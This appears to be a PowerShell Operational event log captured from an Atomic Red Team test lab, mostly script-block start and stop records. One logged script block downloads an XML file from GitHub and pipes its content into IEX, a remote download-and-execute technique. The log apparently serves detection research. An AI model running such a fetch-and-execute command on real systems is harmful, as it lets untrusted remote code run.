EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476719
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 5b8e7e08-1173-40d7-bb93-0e6033fd0ab6
Path:
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476718
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9d95398b-3e98-492b-b3fa-45fd0f159b1c
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476717
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3b2aa8f4-2a17-4372-9d7c-ada3067706ac
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476716
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8daed06a-b00d-41e3-af13-e8221dc47214
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476715
Keywords=None
Message=Started invocation of ScriptBlock ID: 8daed06a-b00d-41e3-af13-e8221dc47214
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476714
Keywords=None
Message=Completed invocation of ScriptBlock ID: c769799e-ed84-4870-8879-969da55d1187
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476713
Keywords=None
Message=Started invocation of ScriptBlock ID: c769799e-ed84-4870-8879-969da55d1187
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476712
Keywords=None
Message=Completed invocation of ScriptBlock ID: 16d17d68-320b-4297-a123-f10ff5526890
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476711
Keywords=None
Message=Completed invocation of ScriptBlock ID: f0c37fea-47ae-48dc-830c-3201538036f4
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476710
Keywords=None
Message=Completed invocation of ScriptBlock ID: 02e284fc-b86a-453b-9a58-46d64065bb27
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476709
Keywords=None
Message=Started invocation of ScriptBlock ID: 02e284fc-b86a-453b-9a58-46d64065bb27
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476708
Keywords=None
Message=Started invocation of ScriptBlock ID: f0c37fea-47ae-48dc-830c-3201538036f4
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476707
Keywords=None
Message=Started invocation of ScriptBlock ID: 16d17d68-320b-4297-a123-f10ff5526890
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476706
Keywords=None
Message=Started invocation of ScriptBlock ID: 3b2aa8f4-2a17-4372-9d7c-ada3067706ac
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476705
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8fd44fe5-6e74-4e0f-89b9-943b1b970dc7
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476704
Keywords=None
Message=Started invocation of ScriptBlock ID: 8fd44fe5-6e74-4e0f-89b9-943b1b970dc7
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476703
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3b2aa8f4-2a17-4372-9d7c-ada3067706ac
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476702
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8daed06a-b00d-41e3-af13-e8221dc47214
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476701
Keywords=None
Message=Started invocation of ScriptBlock ID: 8daed06a-b00d-41e3-af13-e8221dc47214
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476700
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 8daed06a-b00d-41e3-af13-e8221dc47214
Path:
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476699
Keywords=None
Message=Completed invocation of ScriptBlock ID: c769799e-ed84-4870-8879-969da55d1187
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476698
Keywords=None
Message=Started invocation of ScriptBlock ID: c769799e-ed84-4870-8879-969da55d1187
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476697
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: c769799e-ed84-4870-8879-969da55d1187
Path:
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476696
Keywords=None
Message=Completed invocation of ScriptBlock ID: 16d17d68-320b-4297-a123-f10ff5526890
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476695
Keywords=None
Message=Completed invocation of ScriptBlock ID: f0c37fea-47ae-48dc-830c-3201538036f4
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476694
Keywords=None
Message=Completed invocation of ScriptBlock ID: 02e284fc-b86a-453b-9a58-46d64065bb27
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476693
Keywords=None
Message=Started invocation of ScriptBlock ID: 02e284fc-b86a-453b-9a58-46d64065bb27
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476692
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 02e284fc-b86a-453b-9a58-46d64065bb27
Path:
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476691
Keywords=None
Message=Started invocation of ScriptBlock ID: f0c37fea-47ae-48dc-830c-3201538036f4
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476690
Keywords=None
Message=Started invocation of ScriptBlock ID: 16d17d68-320b-4297-a123-f10ff5526890
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476689
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 16d17d68-320b-4297-a123-f10ff5526890
Path:
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476688
Keywords=None
Message=Started invocation of ScriptBlock ID: 3b2aa8f4-2a17-4372-9d7c-ada3067706ac
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8fd44fe5-6e74-4e0f-89b9-943b1b970dc7
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476686
Keywords=None
Message=Started invocation of ScriptBlock ID: 8fd44fe5-6e74-4e0f-89b9-943b1b970dc7
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476685
Keywords=None
Message=Completed invocation of ScriptBlock ID: 628b4b9f-e5f0-4138-a440-e93e73522dbd
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476684
Keywords=None
Message=Started invocation of ScriptBlock ID: 628b4b9f-e5f0-4138-a440-e93e73522dbd
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476683
Keywords=None
Message=Completed invocation of ScriptBlock ID: 22007e10-a45c-4d32-965f-2d6a4914505b
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476682
Keywords=None
Message=Started invocation of ScriptBlock ID: 22007e10-a45c-4d32-965f-2d6a4914505b
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476681
Keywords=None
Message=Started invocation of ScriptBlock ID: 9d95398b-3e98-492b-b3fa-45fd0f159b1c
Runspace ID: 34ebe18f-c381-4c1b-8712-455fb1b89cda
06/15/2021 05:01:37 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476680
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX

ScriptBlock ID: 9d95398b-3e98-492b-b3fa-45fd0f159b1c
Path:
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476814
Keywords=None
Message=Completed invocation of ScriptBlock ID: a38ec8be-8dfd-4ad6-a78c-54b75f40f06e
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476813
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476812
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476811
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476810
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476809
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476808
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476807
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476806
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476805
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476804
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476803
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476802
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476801
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476800
